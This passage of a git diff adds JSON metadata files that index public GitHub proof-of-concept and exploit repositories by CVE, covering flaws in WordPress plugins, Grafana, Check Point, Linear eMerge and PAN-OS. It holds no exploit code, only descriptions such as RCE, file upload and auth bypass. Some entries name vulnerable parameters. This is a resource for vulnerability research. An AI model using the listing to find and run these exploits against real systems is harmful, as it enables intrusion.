+ "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9047.json b/2024/CVE-2024-9047.json new file mode 100644 index 0000000000..e354c713c6 --- /dev/null +++ b/2024/CVE-2024-9047.json @@ -0,0 +1,33 @@ +[ + { + "id": 908089020, + "name": "CVE-2024-9047-PoC", + "full_name": "iSee857\/CVE-2024-9047-PoC", + "owner": { + "login": "iSee857", + "id": 73977770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73977770?v=4", + "html_url": "https:\/\/github.com\/iSee857", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSee857\/CVE-2024-9047-PoC", + "description": "WordPress File Upload插件任意文件读取漏洞(CVE-2024-9047)批量检测脚本", + "fork": false, + "created_at": "2024-12-25T05:19:17Z", + "updated_at": "2025-01-07T08:22:33Z", + "pushed_at": "2024-12-25T05:28:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9061.json b/2024/CVE-2024-9061.json new file mode 100644 index 0000000000..d54d37a3d5 --- /dev/null +++ b/2024/CVE-2024-9061.json @@ -0,0 +1,33 @@ +[ + { + "id": 873461230, + "name": "CVE-2024-9061", + "full_name": "RandomRobbieBF\/CVE-2024-9061", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9061", + "description": "WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Unauthenticated Arbitrary Shortcode Execution via wp_ajax_nopriv_shortcode_Api_Add", + "fork": false, + "created_at": "2024-10-16T07:57:48Z", + "updated_at": "2024-12-12T19:21:27Z", + "pushed_at": "2024-10-16T07:59:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9106.json b/2024/CVE-2024-9106.json new file mode 100644 index 0000000000..f49addf783 --- /dev/null +++ b/2024/CVE-2024-9106.json @@ -0,0 +1,33 @@ +[ + { + "id": 865906316, + "name": "CVE-2024-9106", + "full_name": "RandomRobbieBF\/CVE-2024-9106", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9106", + "description": "Wechat Social login <= 1.3.0 - Authentication Bypass", + "fork": false, + "created_at": "2024-10-01T10:28:08Z", + "updated_at": "2024-10-18T17:57:33Z", + "pushed_at": "2024-10-01T10:31:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9162.json b/2024/CVE-2024-9162.json new file mode 100644 index 0000000000..f7e4e1808a --- /dev/null +++ b/2024/CVE-2024-9162.json @@ -0,0 +1,33 @@ +[ + { + "id": 865025034, + "name": "CVE-2024-9162", + "full_name": "d0n601\/CVE-2024-9162", + "owner": { + "login": "d0n601", + "id": 8961705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8961705?v=4", + "html_url": "https:\/\/github.com\/d0n601", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0n601\/CVE-2024-9162", + "description": "All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection", + "fork": false, + "created_at": "2024-09-29T19:34:59Z", + "updated_at": "2024-12-21T06:52:20Z", + "pushed_at": "2024-10-27T21:45:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9166.json b/2024/CVE-2024-9166.json new file mode 100644 index 0000000000..b6a7461e5b --- /dev/null +++ b/2024/CVE-2024-9166.json @@ -0,0 +1,41 @@ +[ + { + "id": 863789576, + "name": "CVE-2024-9166", + "full_name": "Andrysqui\/CVE-2024-9166", + "owner": { + "login": "Andrysqui", + "id": 130909666, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130909666?v=4", + "html_url": "https:\/\/github.com\/Andrysqui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Andrysqui\/CVE-2024-9166", + "description": "A vulnerability scanner that searches for the CVE-2024-9166 vulnerability on websites, more info about this vulnerability here: https:\/\/www.tenable.com\/cve\/CVE-2024-9166", + "fork": false, + "created_at": "2024-09-26T23:21:06Z", + "updated_at": "2024-11-10T16:23:27Z", + "pushed_at": "2024-10-01T02:46:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ethical-hacking", + "ethical-hacking-tools", + "hacking-script", + "penetration-testing", + "pentest-tool", + "python-script", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9224.json b/2024/CVE-2024-9224.json new file mode 100644 index 0000000000..4a697efbf2 --- /dev/null +++ b/2024/CVE-2024-9224.json @@ -0,0 +1,33 @@ +[ + { + "id": 871101035, + "name": "CVE-2024-9224", + "full_name": "RandomRobbieBF\/CVE-2024-9224", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9224", + "description": "Hello World <= 2.1.1 - Authenticated (Subscriber+) Arbitrary File Read", + "fork": false, + "created_at": "2024-10-11T09:17:20Z", + "updated_at": "2024-10-18T17:57:23Z", + "pushed_at": "2024-10-11T09:21:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9234.json b/2024/CVE-2024-9234.json new file mode 100644 index 0000000000..a6ffe41870 --- /dev/null +++ b/2024/CVE-2024-9234.json @@ -0,0 +1,95 @@ +[ + { + "id": 874396366, + "name": "CVE-2024-9234", + "full_name": "RandomRobbieBF\/CVE-2024-9234", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9234", + "description": "GutenKit <= 2.1.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-10-17T18:48:12Z", + "updated_at": "2024-10-18T17:57:06Z", + "pushed_at": "2024-10-17T18:49:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884623982, + "name": "CVE-2024-9234", + "full_name": "CallMeBatosay\/CVE-2024-9234", + "owner": { + "login": "CallMeBatosay", + "id": 130114991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130114991?v=4", + "html_url": "https:\/\/github.com\/CallMeBatosay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CallMeBatosay\/CVE-2024-9234", + "description": null, + "fork": false, + "created_at": "2024-11-07T04:56:44Z", + "updated_at": "2024-11-07T05:04:21Z", + "pushed_at": "2024-11-07T05:04:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 909321616, + "name": "CVE-2024-9234", + "full_name": "Nxploited\/CVE-2024-9234", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-9234", + "description": null, + "fork": false, + "created_at": "2024-12-28T11:00:02Z", + "updated_at": "2024-12-28T11:11:34Z", + "pushed_at": "2024-12-28T11:11:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9264.json b/2024/CVE-2024-9264.json new file mode 100644 index 0000000000..8ebad10d35 --- /dev/null +++ b/2024/CVE-2024-9264.json @@ -0,0 +1,150 @@ +[ + { + "id": 875253753, + "name": "CVE-2024-9264", + "full_name": "nollium\/CVE-2024-9264", + "owner": { + "login": "nollium", + "id": 54525684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54525684?v=4", + "html_url": "https:\/\/github.com\/nollium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nollium\/CVE-2024-9264", + "description": "Exploit for Grafana arbitrary file-read and RCE (CVE-2024-9264)", + "fork": false, + "created_at": "2024-10-19T13:50:52Z", + "updated_at": "2024-12-16T20:15:32Z", + "pushed_at": "2024-12-16T20:15:28Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authenticated", + "cve", + "cve-2024-9264", + "exploit", + "file-read-vulnerability", + "grafana", + "poc", + "rce", + "rce-exploit", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 17, + "watchers": 88, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 875437112, + "name": "File-Read-CVE-2024-9264", + "full_name": "z3k0sec\/File-Read-CVE-2024-9264", + "owner": { + "login": "z3k0sec", + "id": 135271952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135271952?v=4", + "html_url": "https:\/\/github.com\/z3k0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3k0sec\/File-Read-CVE-2024-9264", + "description": "File Read Proof of Concept for CVE-2024-9264", + "fork": false, + "created_at": "2024-10-20T01:13:37Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-20T11:46:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9264", + "exploit", + "grafana", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875890256, + "name": "CVE-2024-9264-RCE-Exploit", + "full_name": "z3k0sec\/CVE-2024-9264-RCE-Exploit", + "owner": { + "login": "z3k0sec", + "id": 135271952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135271952?v=4", + "html_url": "https:\/\/github.com\/z3k0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3k0sec\/CVE-2024-9264-RCE-Exploit", + "description": "Grafana RCE exploit (CVE-2024-9264)", + "fork": false, + "created_at": "2024-10-21T03:36:05Z", + "updated_at": "2024-12-24T10:06:07Z", + "pushed_at": "2024-10-21T22:31:47Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9264", + "duckdb", + "exploit", + "grafana", + "rce", + "shellfs" + ], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 876056610, + "name": "Grafana-CVE-2024-9264", + "full_name": "punitdarji\/Grafana-CVE-2024-9264", + "owner": { + "login": "punitdarji", + "id": 38101321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38101321?v=4", + "html_url": "https:\/\/github.com\/punitdarji", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/punitdarji\/Grafana-CVE-2024-9264", + "description": null, + "fork": false, + "created_at": "2024-10-21T10:25:27Z", + "updated_at": "2024-10-21T10:26:17Z", + "pushed_at": "2024-10-21T10:26:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9290.json b/2024/CVE-2024-9290.json new file mode 100644 index 0000000000..518564bada --- /dev/null +++ b/2024/CVE-2024-9290.json @@ -0,0 +1,76 @@ +[ + { + "id": 902825495, + "name": "CVE-2024-9290", + "full_name": "RandomRobbieBF\/CVE-2024-9290", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-9290", + "description": "Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-12-13T10:49:12Z", + "updated_at": "2024-12-17T11:04:43Z", + "pushed_at": "2024-12-13T10:52:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9290", + "indeed-wp-superbackup" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907588481, + "name": "CVE-2024-9290", + "full_name": "Jenderal92\/CVE-2024-9290", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2024-9290", + "description": "The tool targets WordPress websites that use the Super Backup & Clone plugin and are vulnerable to arbitrary file upload.", + "fork": false, + "created_at": "2024-12-24T00:04:17Z", + "updated_at": "2024-12-24T15:47:06Z", + "pushed_at": "2024-12-24T00:05:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-9290", + "ethical-hacking", + "exploit-script", + "penetration-testing", + "vulnerability", + "vulnerability-detection", + "wordpress-exploit", + "wordpress-vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9326.json b/2024/CVE-2024-9326.json new file mode 100644 index 0000000000..640d256a0c --- /dev/null +++ b/2024/CVE-2024-9326.json @@ -0,0 +1,33 @@ +[ + { + "id": 895094470, + "name": "CVE-2024-9326-PoC", + "full_name": "ghostwirez\/CVE-2024-9326-PoC", + "owner": { + "login": "ghostwirez", + "id": 64195231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64195231?v=4", + "html_url": "https:\/\/github.com\/ghostwirez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghostwirez\/CVE-2024-9326-PoC", + "description": "This PoC script is designed to verify the presence of CVE-2024-9326, a high SQL Injection vulnerability in PHPGurukul Online Shopping Portal v2.0. It automates the exploitation process to determine if the target web application is vulnerable, allowing security professionals to assess and confirm the flaw's existence.", + "fork": false, + "created_at": "2024-11-27T14:49:54Z", + "updated_at": "2024-11-27T14:52:57Z", + "pushed_at": "2024-11-27T14:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9441.json b/2024/CVE-2024-9441.json new file mode 100644 index 0000000000..7f31d45fe5 --- /dev/null +++ b/2024/CVE-2024-9441.json @@ -0,0 +1,131 @@ +[ + { + "id": 867057499, + "name": "CVE-2024-9441", + "full_name": "adhikara13\/CVE-2024-9441", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-9441", + "description": "Nortek Linear eMerge E3 Pre-Auth RCE PoC (CVE-2024-9441)", + "fork": false, + "created_at": "2024-10-03T11:28:46Z", + "updated_at": "2024-12-28T06:13:35Z", + "pushed_at": "2024-10-03T11:32:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870893978, + "name": "CVE-2024-9441", + "full_name": "p33d\/CVE-2024-9441", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-9441", + "description": null, + "fork": false, + "created_at": "2024-10-10T21:29:08Z", + "updated_at": "2024-10-21T13:17:46Z", + "pushed_at": "2024-10-10T21:33:29Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892378403, + "name": "cve-2024-9441-poc", + "full_name": "XiaomingX\/cve-2024-9441-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-9441-poc", + "description": "CVE-2024-9441是影响Linear eMerge e3系列(版本1.00-07及之前)的操作系统命令注入漏洞。未经身份验证的远程攻击者可通过HTTP请求中“forgot_password”功能的“login_id”参数,执行任意操作系统命令。", + "fork": false, + "created_at": "2024-11-22T02:04:21Z", + "updated_at": "2024-12-08T18:37:37Z", + "pushed_at": "2024-11-22T02:07:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-9441", + "exp", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900915677, + "name": "CVE-2024-9441-Checker", + "full_name": "jk-mayne\/CVE-2024-9441-Checker", + "owner": { + "login": "jk-mayne", + "id": 18690206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18690206?v=4", + "html_url": "https:\/\/github.com\/jk-mayne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jk-mayne\/CVE-2024-9441-Checker", + "description": "A simple python script to test for CVE-2024-9441. ", + "fork": false, + "created_at": "2024-12-09T17:49:37Z", + "updated_at": "2024-12-09T17:50:01Z", + "pushed_at": "2024-12-09T17:49:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9464.json b/2024/CVE-2024-9464.json new file mode 100644 index 0000000000..6a88684efb --- /dev/null +++ b/2024/CVE-2024-9464.json @@ -0,0 +1,33 @@ +[ + { + "id": 870215749, + "name": "CVE-2024-9464", + "full_name": "horizon3ai\/CVE-2024-9464", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-9464", + "description": "Proof of Concept Exploit for CVE-2024-9464", + "fork": false, + "created_at": "2024-10-09T16:36:25Z", + "updated_at": "2024-12-16T15:16:53Z", + "pushed_at": "2024-10-09T16:41:41Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9465.json b/2024/CVE-2024-9465.json new file mode 100644 index 0000000000..a09f2075d0 --- /dev/null +++ b/2024/CVE-2024-9465.json @@ -0,0 +1,95 @@ +[ + { + "id": 870208687, + "name": "CVE-2024-9465", + "full_name": "horizon3ai\/CVE-2024-9465", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-9465", + "description": "Proof of Concept Exploit for CVE-2024-9465", + "fork": false, + "created_at": "2024-10-09T16:22:05Z", + "updated_at": "2024-11-26T23:20:04Z", + "pushed_at": "2024-10-09T16:34:42Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 870541259, + "name": "CVE-2024-9465", + "full_name": "mustafaakalin\/CVE-2024-9465", + "owner": { + "login": "mustafaakalin", + "id": 121257754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121257754?v=4", + "html_url": "https:\/\/github.com\/mustafaakalin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mustafaakalin\/CVE-2024-9465", + "description": "Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)", + "fork": false, + "created_at": "2024-10-10T08:23:31Z", + "updated_at": "2024-10-10T08:39:26Z", + "pushed_at": "2024-10-10T08:39:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897887165, + "name": "cve-2024-9465-poc", + "full_name": "XiaomingX\/cve-2024-9465-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-9465-poc", + "description": "Proof of Concept Exploit for CVE-2024-9465", + "fork": false, + "created_at": "2024-12-03T12:16:44Z", + "updated_at": "2025-01-07T14:21:34Z", + "pushed_at": "2024-12-03T12:21:35Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9466.json b/2024/CVE-2024-9466.json new file mode 100644 index 0000000000..005a4ef29e --- /dev/null +++ b/2024/CVE-2024-9466.json @@ -0,0 +1,33 @@ +[ + { + "id": 875151386, + "name": "CVE-2024-9466", + "full_name": "holypryx\/CVE-2024-9466", + "owner": { + "login": "holypryx", + "id": 182792867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182792867?v=4", + "html_url": "https:\/\/github.com\/holypryx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/holypryx\/CVE-2024-9466", + "description": "CVE-2024-9466 poc", + "fork": false, + "created_at": "2024-10-19T08:22:13Z", + "updated_at": "2024-10-22T02:01:29Z", + "pushed_at": "2024-10-19T08:25:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9474.json b/2024/CVE-2024-9474.json new file mode 100644 index 0000000000..f0dccb6b50 --- /dev/null +++ b/2024/CVE-2024-9474.json @@ -0,0 +1,126 @@ +[ + { + "id": 891077206, + "name": "CVE-2024-9474", + "full_name": "Chocapikk\/CVE-2024-9474", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-9474", + "description": "PAN-OS auth bypass + RCE", + "fork": false, + "created_at": "2024-11-19T17:26:27Z", + "updated_at": "2025-01-02T13:12:29Z", + "pushed_at": "2024-11-19T17:38:29Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 43, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891185979, + "name": "CVE-2024-9474", + "full_name": "k4nfr3\/CVE-2024-9474", + "owner": { + "login": "k4nfr3", + "id": 45294916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45294916?v=4", + "html_url": "https:\/\/github.com\/k4nfr3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k4nfr3\/CVE-2024-9474", + "description": null, + "fork": false, + "created_at": "2024-11-19T22:03:13Z", + "updated_at": "2024-11-25T12:55:20Z", + "pushed_at": "2024-11-22T16:39:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891754275, + "name": "CVE-2024-9474", + "full_name": "deathvu\/CVE-2024-9474", + "owner": { + "login": "deathvu", + "id": 47398055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47398055?v=4", + "html_url": "https:\/\/github.com\/deathvu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deathvu\/CVE-2024-9474", + "description": "PoC for PAN-OS Exploit", + "fork": false, + "created_at": "2024-11-20T22:31:50Z", + "updated_at": "2024-11-20T22:35:13Z", + "pushed_at": "2024-11-20T22:35:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 901635740, + "name": "PAN-OS_CVE-2024-9474", + "full_name": "coskper-papa\/PAN-OS_CVE-2024-9474", + "owner": { + "login": "coskper-papa", + "id": 90187053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90187053?v=4", + "html_url": "https:\/\/github.com\/coskper-papa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coskper-papa\/PAN-OS_CVE-2024-9474", + "description": "Palo Alto Networks PAN-OS(CVE-2024-9474) POC", + "fork": false, + "created_at": "2024-12-11T03:10:41Z", + "updated_at": "2024-12-14T17:39:14Z", + "pushed_at": "2024-12-11T03:36:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-9570.json 